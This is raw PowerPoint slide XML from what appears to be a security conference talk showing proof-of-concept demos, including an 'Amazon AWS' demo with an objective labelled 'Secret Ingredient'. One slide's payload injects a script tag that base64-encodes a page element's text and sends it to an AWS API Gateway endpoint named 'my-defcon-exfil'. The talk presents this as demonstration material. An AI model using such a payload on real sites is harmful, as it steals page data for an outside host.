              <a:rPr lang="en-GB" sz="2200" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="2200" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2200" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="9CDCFE"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>console</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2200" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2200" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="DCDCAA"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>log</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2200" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2200" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CE9178"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>'Decoded payload:'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2200" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2200" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="9CDCFE"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>decoded</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2200" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="2200" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2200" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C586C0"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>return</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2200" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2200" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4FC1FF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>response</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2200" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="2200" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>};</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A2D214CE-F9B7-79AE-4AA6-FA0F59AED642}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4611441" y="4376778"/>
            <a:ext cx="7360600" cy="108134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508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4</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Amazon AWS</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Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Payload</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" sz="2400" dirty="0">
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:br>
              <a:rPr lang="en-GB" sz="2400" dirty="0">
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Objective #2 – Secret Ingredient</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="40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499419" y="1092905"/>
            <a:ext cx="7519755" cy="553998"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="3000" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="9CDCFE"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="3000" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="3000" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="9CDCFE"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>document</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="3000" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="3000" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="DCDCAA"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>createElement</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="3000" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="3000" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CE9178"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"script"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="30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91A3EC6-406C-126A-0A05-C3D34966A2C4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4491443" y="1809869"/>
            <a:ext cx="7527731" cy="2862322"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="3000" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="9CDCFE"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="3000" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="3000" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="9CDCFE"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="3000" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="3000" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CE9178"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"https://f7aq2nmst6.execute-api.eu-west-1.amazonaws.com/testing/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="3000" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="CE9178"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>my-defcon-exfil?data</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="3000" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CE9178"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="3000" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>+</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="3000" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="DCDCAA"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>btoa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="3000" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="3000" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="9CDCFE"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>document</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="3000" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="3000" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="DCDCAA"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>getElementById</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="3000" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="3000" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CE9178"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"secret-ingredient"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="3000" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>).</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="3000" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="9CDCFE"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>innerText</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="3000" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>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71A46F1-9DFE-15A0-0344-CFF8BE4EA436}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4585832" y="4934098"/>
            <a:ext cx="7433342" cy="553998"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="3000" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="9CDCFE"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>document</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="3000" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="3000" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="4FC1FF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>head</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="3000" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="3000" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="DCDCAA"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>appendChild</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="3000" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="3000" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="9CDCFE"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="30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C5DA3D8-B4ED-51F5-E36A-1F311974C2A0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4934309" y="2812211"/>
            <a:ext cx="2907102" cy="3968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D820F4E7-B879-AD7F-4517-CD2130A2B573}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5800725" y="3298756"/>
            <a:ext cx="1247775" cy="3502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1594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6B512BA-B115-9C1C-7374-362EE66A9DBB}"/>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algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="5400" dirty="0">
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Demo 4</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="5400" dirty="0">
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="5400" dirty="0">
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Amazon AWS</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="5400" dirty="0">
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:br>
              <a:rPr lang="en-US" sz="5400" dirty="0">
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Profit 💸</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="5400" kern="1200" dirty="0">
              <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>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F484BC-0D33-4AFD-2EBF-1DCC5D00F7FE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4530962" y="266596"/>
            <a:ext cx="7468721" cy="553998"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-GB" sz="1500" b="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="CCCCCC"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:endParaRPr lang="en-GB" sz="1500" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E695BDEE-5063-BDB4-10CC-CCC00AC9B6F4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2"/>
          <a:srcRect r="6685"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4530962" y="1580461"/>
            <a:ext cx="7358625" cy="3697077"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1400001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A2F989-989C-DF80-D9AA-0F26DD0A03E6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2"/>
          <a:srcRect l="3378" t="62717" r="6685"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="643467" y="2366647"/>
            <a:ext cx="10905066" cy="2124705"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3026075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D1C65B-EE5A-1AA2-0BFE-966702CB733D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="828673" y="392815"/>
            <a:ext cx="10534650" cy="728620"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="b">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF7900"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>PoC 5 and 6</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" kern="1200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF7900"/>
              </a:solidFill>
              <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="10" name="Table 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B526528E-5DBA-FFD9-FEE4-FA04EA609738}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3892252417"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="340740" y="1678422"/>
          <a:ext cx="11510516" cy="4297680"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{72833802-FEF1-4C79-8D5D-14CF1EAF98D9}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="2073276">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="406545722"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="4389120">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="4146693246"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="5048120">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3802557313"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="381985">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="r"/>
                      <a:endParaRPr lang="en-GB" sz="2800" dirty="0">
                        <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2800" dirty="0">
                          <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
